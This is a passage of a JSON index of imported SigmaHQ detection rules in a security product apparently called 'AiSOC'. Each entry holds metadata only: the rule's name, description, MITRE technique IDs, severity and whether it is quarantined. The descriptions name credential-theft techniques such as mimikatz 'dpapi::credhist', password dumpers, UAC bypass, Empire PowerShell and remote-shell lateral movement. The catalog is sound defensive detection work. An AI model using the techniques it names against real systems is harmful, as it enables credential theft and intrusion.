rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7892ec59-c5bb-496d-8968-e5d210ca3ac4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml" } }, { "id": "sigmahq-sigma-7899144b-e416-4c28-b0b5-ab8f9e0a541d", "type": "detection", "name": "Okta Application Modified or Deleted", "description": "Detects when an application is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-application-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_application_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-78a34b67-3c39-4886-8fb4-61c46dc18ecd", "type": "detection", "name": "Microsoft 365 - Unusual Volume of File Deletion", "description": "Detects when Microsoft Cloud App Security reports that a user has deleted an unusually large volume of files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/microsoft-365-unusual-volume-of-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_unusual_volume_of_file_deletion.yml" } }, { "id": "sigmahq-sigma-78a80655-a51e-4669-bc6b-e9d206a462ee", "type": "detection", "name": "Install Root Certificate", "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/install-root-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78a80655-a51e-4669-bc6b-e9d206a462ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" } }, { "id": "sigmahq-sigma-78aa1347-1517-4454-9982-b338d6df8343", "type": "detection", "name": "Powershell MsXml COM Object", "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-msxml-com-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78aa1347-1517-4454-9982-b338d6df8343", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" } }, { "id": "sigmahq-sigma-78b3756a-7804-4ef7-8555-7b9024a02e2d", "type": "detection", "name": "AWS S3 Data Management Tampering", "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-s3-data-management-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78b3756a-7804-4ef7-8555-7b9024a02e2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_s3_data_management_tampering.yml" } }, { "id": 
"sigmahq-sigma-78bc5783-81d9-4d73-ac97-59f6db4f72a8", "type": "detection", "name": "Relevant Anti-Virus Signature Keywords In Application Log", "description": "Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/relevant-anti-virus-signature-keywords-in-application-log.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/Other/win_av_relevant_match.yml" } }, { "id": "sigmahq-sigma-78cc2dd2-7d20-4d32-93ff-057084c38b93", "type": "detection", "name": "Antivirus Password Dumper Detection", "description": "Detects a highly relevant Antivirus alert that reports a password dumper.\nThis event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003", "T1558", "T1003.001", "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/antivirus-password-dumper-detection.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78cc2dd2-7d20-4d32-93ff-057084c38b93", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_password_dumper.yml" } }, { "id": "sigmahq-sigma-78d5cab4-557e-454f-9fb9-a222bd0d5edc", "type": "detection", "name": "External Remote SMB Logon from Public IP", "description": "Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1078", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/external-remote-smb-logon-from-public-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78d5cab4-557e-454f-9fb9-a222bd0d5edc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml" } }, { "id": "sigmahq-sigma-78f10490-f2f4-4d19-a75b-4e0683bf3b8d", "type": "detection", "name": "Suspicious Speech Runtime Binary Child Process", "description": "Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.\nChild processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.003", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-speech-runtime-binary-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "78f10490-f2f4-4d19-a75b-4e0683bf3b8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_speechruntime_child_process.yml" } }, { "id": "sigmahq-sigma-790317c0-0a36-4a6a-a105-6e576bf99a14", "type": "detection", "name": "COM Object Hijacking Via Modification Of Default System CLSID Default Value", "description": "Detects potential COM object hijacking via modification of default system CLSID.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/com-object-hijacking-via-modification-of-default-system-clsid-default-value.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "790317c0-0a36-4a6a-a105-6e576bf99a14", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_builtin.yml" } }, { "id": "sigmahq-sigma-79609c82-a488-426e-abcf-9f341a39365d", "type": "detection", "name": "All Rules Have Been Deleted From The Windows Firewall Configuration", "description": "Detects when all the rules have been deleted from the Windows Defender Firewall configuration", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/all-rules-have-been-deleted-from-the-windows-firewall-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79609c82-a488-426e-abcf-9f341a39365d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml" } }, { "id": "sigmahq-sigma-797011dc-44f4-4e6f-9f10-a8ceefbe566b", "type": "detection", "name": "WMI Backdoor Exchange Transport Agent", "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-backdoor-exchange-transport-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" } }, { "id": "sigmahq-sigma-799a5f48-0ac1-4e0f-9152-71d137d48c2a", "type": "detection", "name": "Abusable DLL Potential 
Sideloading From Suspicious Location", "description": "Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/abusable-dll-potential-sideloading-from-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "799a5f48-0ac1-4e0f-9152-71d137d48c2a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_abused_dlls_susp_paths.yml" } }, { "id": "sigmahq-sigma-79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "type": "detection", "name": "Msiexec Quiet Installation", "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msiexec-quiet-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" } }, { "id": "sigmahq-sigma-79b06761-465f-4f88-9ef2-150e24d3d737", "type": "detection", "name": "Potential SysInternals ProcDump Evasion", "description": "Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-sysinternals-procdump-evasion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79b06761-465f-4f88-9ef2-150e24d3d737", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml" } }, { "id": "sigmahq-sigma-79ce34ca-af29-4d0e-b832-fc1b377020db", "type": "detection", "name": "Whoami.EXE Execution From Privileged Process", "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/whoami-exe-execution-from-privileged-process.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79ce34ca-af29-4d0e-b832-fc1b377020db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml" } }, { "id": "sigmahq-sigma-79df3f68-dccb-48e9-9171-b75cbc37c51d", "type": "detection", "name": "Potential Lateral Movement via Windows Remote Shell", "description": "Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-lateral-movement-via-windows-remote-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79df3f68-dccb-48e9-9171-b75cbc37c51d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrshost_command_execution.yml" } }, { "id": "sigmahq-sigma-79f4ede3-402e-41c8-bc3e-ebbf5f162581", "type": "detection", "name": "HackTool - Empire PowerShell Launch Parameters", "description": "Detects suspicious powershell command line parameters used in Empire", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-empire-powershell-launch-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml" } }, { "id": "sigmahq-sigma-7a01183d-71a2-46ad-ad5c-acd989ac1793", "type": "detection", "name": "UAC Bypass Abusing Winsat Path Parsing - Process", "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-abusing-winsat-path-parsing-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" } }, { "id": "sigmahq-sigma-7a02e22e-b885-4404-b38b-1ddc7e65258a", "type": "detection", "name": "Suspicious Schtasks Schedule Type With High Privileges", "description": "Detects scheduled task creations or modification to be run with high privileges on a 
suspicious schedule type", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-schtasks-schedule-type-with-high-privileges.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_type_system.yml" } }, { "id": "sigmahq-sigma-7a14080d-a048-4de8-ae58-604ce58a795b", "type": "detection", "name": "Remote File Copy", "description": "Detects the use of tools that copy files from or to remote systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/remote-file-copy.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a14080d-a048-4de8-ae58-604ce58a795b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_file_copy.yml" } }, { "id": "sigmahq-sigma-7a1b4c5e-8f3d-4b9a-7c2e-1f4a5b8c6d9e", "type": "detection", "name": "Suspicious Space Characters in RunMRU Registry Path - ClickFix", "description": "Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing 
lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.004", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-space-characters-in-runmru-registry-path-clickfix.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a1b4c5e-8f3d-4b9a-7c2e-1f4a5b8c6d9e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_runmru_space_character.yml" } }, { "id": "sigmahq-sigma-7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", "type": "detection", "name": "Access To Windows Credential History File By Uncommon Applications", "description": "Detects file access requests to the Windows Credential History File by an uncommon application.\nThis can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::credhist\" function", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/access-to-windows-credential-history-file-by-uncommon-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_susp_credhist.yml" } }, { "id": "sigmahq-sigma-7a3b6d1f-4a2b-4f8c-9d7e-e9f8cbf21a35", "type": "detection", "name": "Potential JLI.dll Side-Loading", "description": "Detects potential DLL side-loading of jli.dll.\nJLI.dll has been observed being side-loaded by Java processes by various threat actors, including APT41, XWorm,\nand others in order to load malicious payloads in context of legitimate Java processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-jli-dll-side-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a3b6d1f-4a2b-4f8c-9d7e-e9f8cbf21a35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_jli.yml" } }, { "id": "sigmahq-sigma-7a4409fc-f8ca-45f6-8006-127d779eaad9", "type": "detection", "name": "LoadBalancer Security Group Modification", "description": "Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB).\nThis can indicate a misconfiguration allowing more traffic into the system than required, or that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/loadbalancer-security-group-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a4409fc-f8ca-45f6-8006-127d779eaad9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_loadbalancer.yml" } }, { "id": "sigmahq-sigma-7a4d9232-92fc-404d-8ce1-4c92e7caf539", "type": "detection", "name": "HackTool - Stracciatella Execution", "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-stracciatella-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_stracciatella_execution.yml" } }, { "id": "sigmahq-sigma-7a74da6b-ea76-47db-92cc-874ad90df734", "type": "detection", "name": "Suspicious MSDT Parent Process", "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msdt-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a74da6b-ea76-47db-92cc-874ad90df734", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" } }, { "id": "sigmahq-sigma-7a922f1b-2635-4d6c-91ef-af228b198ad3", "type": "detection", "name": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", 
"T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-compress-obfuscation-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" } }, { "id": "sigmahq-sigma-7aa4e81a-a65c-4e10-9f81-b200eb229d7d", "type": "detection", "name": "Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script", "description": "Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script to run for a specific VM state", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-vmwaretoolboxcmd-exe-vm-state-change-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7aa4e81a-a65c-4e10-9f81-b200eb229d7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml" } }, { "id": "sigmahq-sigma-7aa7009a-28b9-4344-8c1f-159489a390df", "type": "detection", "name": "HackTool - 
